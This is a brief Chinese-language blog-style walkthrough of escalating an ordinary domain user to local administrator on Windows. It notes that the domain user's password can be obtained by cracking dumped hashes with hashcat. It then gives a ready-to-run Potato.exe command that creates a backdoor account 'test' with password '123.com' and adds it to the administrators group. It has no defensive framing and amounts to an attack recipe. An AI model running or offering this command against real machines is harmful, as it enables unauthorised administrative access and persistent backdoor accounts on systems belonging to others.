注意这个不是提域控的管理身份,而是利用普通的域用户进行提取为本地的管理员权限.只需要知道普通域用户的账号和密码即可,这个可以通过抓取本地的用户hash进行用hashcat进行破解即可.
- 一开始使用普通的域用户来创建用户是创建不成功的.
2.使用Potato.exe来进行创建用户.
ip是本地的域用户ip,net user是创建一个用户,net localgroup是添加到管理员组中.
Potato.exe -ip 192.168.0.207 -disable_exhaust true -cmd "C:\Windows\System32\cmd.exe /K net user test 123.com /add && net localgroup administrators test /add"
3.查询是否创建用户成功
这篇文章没有什么技术含量,难的地方就是当你进去到内网中,应该如何去抓取hash,怎么绕过防火墙等等的操作.共勉.